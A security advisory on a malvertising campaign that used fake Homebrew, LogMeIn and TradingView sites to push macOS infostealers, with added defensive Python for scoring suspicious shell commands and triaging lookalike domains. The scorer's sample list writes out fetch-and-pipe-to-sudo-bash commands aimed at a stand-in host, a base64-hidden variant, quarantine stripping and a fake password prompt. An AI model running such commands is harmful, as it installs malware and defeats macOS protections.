Executive Summary
In October 2025, a malvertising campaign abused Google Ads to distribute infostealing malware through fake Homebrew, LogMeIn, and TradingView websites aimed at macOS users and developers. The threat actors registered over 85 convincing domains and used ClickFix-style social engineering to talk victims into pasting terminal commands that fetched and ran stealers such as AMOS (Atomic macOS Stealer) and Odyssey Stealer. Because the victim runs the command themselves, the payload never passes through the download-and-open flow that Gatekeeper and browser download warnings are designed to interrupt. Once executed, the stealers harvested browser credentials, cryptocurrency wallets, and sensitive files and forwarded the stolen data to attacker-controlled servers. The campaign shows how effective ClickFix lures are against technical audiences and how little trust search advertising deserves as a software distribution channel.
The incident is particularly relevant as infostealer malware continues to evolve with new tactics, including sophisticated social engineering, supply chain targeting, and persistent access capabilities. Organizations face increasing pressure to defend against rapidly shifting malware delivery channels and enforce user education to reduce the likelihood of compromise.
Why This Matters Now
This campaign demonstrates that attackers are actively weaponizing trusted platforms like Google Ads to deliver high-impact malware to technical users, including developers. The abuse of search advertising and social engineering to distribute infostealers poses urgent threats to data security, compliance, and brand integrity, especially as these campaigns target both personal and enterprise environments.
Attack Path Analysis
The attack began with malicious Google ads steering users to fake Homebrew, LogMeIn, and TradingView sites (Initial Compromise). Victims were talked into pasting terminal commands that downloaded the infostealer and ran it with elevated privileges, whether through sudo or through a password prompt presented by the malware (Privilege Escalation). After installation, the malware interacted with macOS services and, in the variants with backdoor capability, established persistence while attempting to evade detection (Persistence and Defense Evasion; the sources describe no lateral movement by the stealer itself, which would instead follow from reuse of the stolen credentials). The malware contacted command-and-control infrastructure to receive further instructions and give operators access (Command & Control). Credentials, browser data, and files were exfiltrated to attacker infrastructure (Exfiltration). The resulting impact included credential theft, loss of financial and personal data, and the risk of backdoored hosts being revisited for future compromise (Impact).
Kill Chain Progression
Initial Compromise
Description
Users were deceived by malicious ads, and the phishing sites they led to, into pasting terminal commands that downloaded and ran the malicious installer.
MITRE ATT&CK® Techniques
The techniques below cover the whole chain, not only the initial compromise:
Phishing: Spearphishing via Service (T1566.003)
Trusted Relationship (T1199)
User Execution: Malicious Link (T1204.001)
Command and Scripting Interpreter: Unix Shell (T1059.004)
Abuse Elevation Control Mechanism: Sudo and Sudo Caching (T1548.003)
Impair Defenses: Disable or Modify Tools (T1562.001)
Screen Capture (T1113)
Exfiltration Over C2 Channel (T1041)
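The pasted-command lure described above is the one artefact a defender can reliably look for on the endpoint. What follows is an added example, not code from the original advisory or from any of the cited reports: a scorer for shell command lines, as an EDR process-creation feed or a user's zsh history would supply them, that flags the traits of a ClickFix install one-liner (fetch-and-pipe to a shell, base64-wrapped commands, quarantine-attribute stripping, fake password dialogs, sudo). The sample commands, the lookalike host brew-sh.invalid, the indicator weights and the trusted-host allowlist are all constructed for this example. The point it makes that a plain "curl | bash" rule misses: the genuine Homebrew installer is itself a curl-into-bash one-liner, so the distinguishing signal is the host the script is fetched from, not the shape of the command.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Hosts from which "fetch a script and pipe it into a shell" is expected in a
# developer fleet. Assumption: the organisation maintains this list; the single
# entry here is where the official Homebrew installer is served from.
TRUSTED_INSTALL_HOSTS = {"raw.githubusercontent.com"}

# Indicator name -> (regex, weight). Weights are this example's own assumption,
# not values from any vendor ruleset.
INDICATORS = {
    # curl/wget output piped straight into a shell, optionally via sudo
    "pipe_to_shell": (re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"), 2),
    # bash -c "$(curl ...)" form used by the genuine Homebrew installer and its imitators
    "subst_to_shell": (re.compile(r"(?:ba|z)?sh\s+-c\s+[\"']?\$\((?:curl|wget)\b"), 2),
    # command text hidden behind base64 (macOS base64 accepts -D as well as -d)
    "base64_decode": (re.compile(r"\bbase64\b\s+(?:-d|-D|--decode)\b"), 2),
    # stripping the com.apple.quarantine attribute disables the Gatekeeper check
    "quarantine_strip": (re.compile(r"\bxattr\b\s+(?:-[a-z]*c[a-z]*\b|-d\s+com\.apple\.quarantine)"), 3),
    # AppleScript password prompt with a hidden answer field
    "password_dialog": (re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.S), 3),
    "sudo": (re.compile(r"\bsudo\b"), 1),
    "raw_ip_url": (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b"), 2),
    "tmp_exec": (re.compile(r"\bchmod\s+\+x\s+/(?:private/)?(?:tmp|var/tmp)/"), 1),
}
URL_RE = re.compile(r"https?://[^\s\"'|)<>]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class Finding:
    command: str
    indicators: list[str]
    untrusted_hosts: list[str]
    score: int
    verdict: str


def _decoded_payloads(command: str) -> list[str]:
    """Return printable text hidden inside base64 tokens on the command line."""
    found = []
    for token in B64_RE.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # URL paths and random words rarely survive strict decoding
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            found.append(text)
    return found


def analyze(command: str, _depth: int = 0) -> Finding:
    """Score one command line; base64 blobs are unwrapped one level and rescored."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(command)]
    score = sum(INDICATORS[name][1] for name in hits)
    hosts = [urlparse(url).hostname or "" for url in URL_RE.findall(command)]
    untrusted = [h for h in hosts if h not in TRUSTED_INSTALL_HOSTS]
    # The genuine Homebrew one-liner also pipes a script into bash; what separates
    # it from a ClickFix imitation is the host the script comes from.
    if untrusted and ("pipe_to_shell" in hits or "subst_to_shell" in hits):
        hits.append("untrusted_install_host")
        score += 2
    if _depth == 0:
        for payload in _decoded_payloads(command):
            inner = analyze(payload, _depth=1)
            hits.extend("decoded:" + h for h in inner.indicators)
            untrusted.extend(inner.untrusted_hosts)
            score += inner.score
    verdict = "malicious" if score >= 5 else "suspicious" if score >= 3 else "benign"
    return Finding(command, hits, untrusted, score, verdict)


# Constructed sample command lines, as an EDR or shell-history feed would supply
# them. None are commands captured from the campaign; the lookalike host uses the
# reserved .invalid TLD.
_HIDDEN = base64.b64encode(b"curl -fsSL https://brew-sh.invalid/install.sh | bash").decode()
SAMPLE_COMMANDS = [
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "curl -fsSL https://brew-sh.invalid/install.sh | sudo bash",
    f"echo '{_HIDDEN}' | base64 -D | bash",
    "xattr -c ~/Downloads/TradingView.dmg && open ~/Downloads/TradingView.dmg",
    "osascript -e 'display dialog \"macOS needs your password to continue\" default answer \"\" with hidden answer'",
    "brew install wget",
]


def scan(commands: list[str]) -> list[Finding]:
    return [analyze(c) for c in commands]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDS):
        print(f"{f.verdict:10} score={f.score:2} {f.indicators} {f.command[:60]}")
```

Run as a script it prints one line per sample: the real Homebrew installer scores benign, the same one-liner pointed at the lookalike host scores malicious, and the base64-wrapped variant is caught because the decoded text is rescored with the same rules. The thresholds are deliberately conservative; in production the score would be one input to a detection rule alongside parent process (a browser or Terminal launched from a browser link) and the age of the fetched host's domain registration.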
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Review of Audit Logs
Control ID: 10.2.1
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – Information and Communication Technology (ICT) Risk Management
Control ID: Art. 9
CISA Zero Trust Maturity Model 2.0 – User Education and Social Engineering Mitigation
Control ID: Identity Pillar - User Education
NIS2 Directive – Technical and Organizational Measures to Manage Risks
Control ID: Art. 21
Sector Implications
Industry-specific impact of the campaign, including operational, regulatory, and cloud security risks.
Computer Software/Engineering
macOS developers were targeted through fake Homebrew sites that delivered the AMOS infostealer via malicious Google ads; credentials and tokens harvested from a developer workstation expose development environments and the source code repositories they authenticate to.
Financial Services
TradingView impersonation sites steal cryptocurrency credentials and financial data, exploiting trust in legitimate trading platforms to harvest sensitive financial information.
Information Technology/IT
LogMeIn spoofing targets IT professionals who rely on remote access tools; stolen remote-access and browser credentials can be replayed against enterprise systems, turning a single endpoint theft into network-wide exposure.
Capital Markets/Hedge Fund/Private Equity
Trading platform impersonation specifically targets financial analysts and traders, stealing market analysis credentials and potentially compromising proprietary trading strategies.
Sources
- Google ads for fake Homebrew, LogMeIn sites push infostealers (https://www.bleepingcomputer.com/news/security/google-ads-for-fake-homebrew-logmein-sites-push-infostealers/)
- Atomic macOS Stealer malware now has a backdoor (https://appleinsider.com/articles/25/07/08/atomic-macos-stealer-malware-is-now-more-dangerous)
- macOS malware Poseidon Stealer rebranded as Odyssey Stealer (https://www.scworld.com/news/macos-malware-poseidon-staler-rebranded-as-odyssey-stealer)
- Atomic macOS Stealer leads sensitive data theft on macOS (https://news.sophos.com/en-us/2024/09/06/atomic-macos-stealer-leads-sensitive-data-theft-on-macos/)
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Cloud Native Security Fabric (CNSF) and Zero Trust controls such as egress policy enforcement, microsegmentation, and anomaly detection would have limited the adversary's ability to establish malicious connections, reuse stolen credentials against internal services, or exfiltrate sensitive data, disrupting the later stages of the attack chain.
Control: Cloud Firewall (ACF)
Mitigation: Access to known malicious domains and URLs would be blocked.
Control: Threat Detection & Anomaly Response
Mitigation: Anomalous behaviour following the compromise, such as unexpected outbound connections from developer workstations or cloud workloads, is detected and flagged for incident response.
Control: Zero Trust Segmentation
Mitigation: East-west movement of malware across services and workloads is prevented.
Control: Egress Security & Policy Enforcement
Mitigation: Malicious outbound traffic to command and control servers is blocked or closely monitored.
Control: Encrypted Traffic (HPE)
Mitigation: Unexpected or anomalous data transfers are detected, denying the stealer a covert exfiltration path.
Full visibility and centralized policy allow rapid detection and remediation, limiting attack impact. These controls only see traffic that transits the fabric, however: a developer laptop on a home or public network is outside them, so endpoint controls (Gatekeeper, EDR, sudo restrictions) and user awareness remain the first line of defence against a ClickFix lure.
Impact at a Glance
Affected Business Functions
- Software Development
- Financial Services
- Cryptocurrency Trading
Estimated downtime: 3 days
Estimated loss: $500,000
Potential exposure of sensitive data including system passwords, browser-stored credentials, cryptocurrency wallet information, and personal files. This could lead to unauthorized access to financial accounts, intellectual property theft, and compromise of confidential communications.
Recommended Actions
Key Takeaways & Next Steps
- Implement URL and domain filtering at cloud firewall egress points to block access to known phishing and malware distribution sites, and feed newly identified lookalike domains into that blocklist quickly, since this campaign rotated through more than 85 of them.
- Treat any terminal command offered by an advertisement or its landing page as hostile: obtain the Homebrew install command only from brew.sh, and the LogMeIn and TradingView clients only from the vendors' own domains.
- Enforce zero trust segmentation and microsegmentation to prevent lateral movement and restrict workloads to only the communications they need.
- Deploy continuous threat detection and anomaly response to alert on unusual privilege escalations, process behaviours, or outbound network traffic.
- Apply strict egress policies combined with encrypted traffic inspection to block unauthorized data exfiltration and C2 communications.
- Centralize network visibility and policy enforcement across all cloud and hybrid environments to enable rapid incident response and minimize attack impact.
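Domain filtering at the egress point is only as good as the speed with which lookalike domains reach the blocklist, and with more than 85 registered for one campaign that cannot be a manual job. The following is an added example, not code from the original page or from any vendor product, of the triage step that feeds such a blocklist: candidate domains from an ad-landing or passive-DNS feed are scored against the three impersonated brands, undoing digit and multi-character homoglyph swaps, checking every label rather than just the apex, and falling back to edit distance for near misses. The sample domains, the .invalid lookalikes, the homoglyph table and the legitimate-domain allowlist are all constructed for this example; the naive last-two-labels registrable-domain split is a stand-in for the Public Suffix List a production pipeline would use.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Impersonated brands: the strings a lookalike will try to carry, and the domains
# the brand legitimately uses. Assumption: the legitimate set is the organisation's
# own allowlist, kept deliberately small here.
BRANDS = {
    "homebrew": {"terms": ("homebrew", "brew"), "legit": {"brew.sh", "github.com"}},
    "logmein": {"terms": ("logmein",), "legit": {"logmein.com"}},
    "tradingview": {"terms": ("tradingview",), "legit": {"tradingview.com"}},
}
# Character substitutions common in lookalike registrations (illustrative table).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "8": "b"})


@dataclass
class Verdict:
    domain: str
    kind: str            # legitimate | brand_in_label | near_miss | no_match
    brand: Optional[str]
    detail: str


def registrable(domain: str) -> str:
    """Naive eTLD+1 (last two labels). A real pipeline uses the Public Suffix List."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def normalize(label: str) -> str:
    """Undo digit and multi-character homoglyph swaps, then keep letters only."""
    label = label.lower().translate(HOMOGLYPHS).replace("vv", "w").replace("rn", "m")
    return re.sub(r"[^a-z]", "", label)


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str) -> Verdict:
    apex = registrable(domain)
    for brand, spec in BRANDS.items():
        if apex in spec["legit"]:
            return Verdict(domain, "legitimate", brand, apex)
    # Every label except the TLD is examined: "brew.sh.<something>.<tld>" puts the
    # brand in a subdomain of an unrelated apex and still reads as brew.sh in an ad.
    labels = [normalize(part) for part in domain.lower().split(".")[:-1]]
    for label in labels:
        for brand, spec in BRANDS.items():
            for term in spec["terms"]:
                if term in label:
                    return Verdict(domain, "brand_in_label", brand, f"'{term}' in '{label}'")
    for label in labels:
        for brand, spec in BRANDS.items():
            term = spec["terms"][0]
            d = levenshtein(label, term)
            if d <= 2 and len(label) >= len(term) - 2:  # guard against short labels
                return Verdict(domain, "near_miss", brand, f"edit distance {d} from '{term}'")
    return Verdict(domain, "no_match", None, "")


# Constructed candidate list, as an ad-landing or passive-DNS feed might yield it.
# None are domains from the campaign; the lookalikes use the reserved .invalid TLD.
SAMPLE_DOMAINS = [
    "brew.sh",
    "www.tradingview.com",
    "h0mebrew-install.invalid",
    "tradingvievv.invalid",
    "logrnein.invalid",
    "logmeln.invalid",
    "brew.sh.downloads.invalid",
    "brewery.invalid",
    "weather.invalid",
]


def triage(domains: list[str]) -> list[Verdict]:
    """Return only the domains worth an analyst's attention, legitimate ones removed."""
    return [v for v in map(classify, domains) if v.kind not in ("legitimate", "no_match")]


if __name__ == "__main__":
    for v in triage(SAMPLE_DOMAINS):
        print(f"{v.kind:15} {v.brand or '-':12} {v.domain:28} {v.detail}")
```

The output is a triage queue, not a blocklist: "brewery.invalid" is flagged because the short term "brew" is needed to catch "brew.sh.downloads.invalid", and an analyst (or a second signal such as registration age or the ad that led there) decides which flagged domains go into the egress policy.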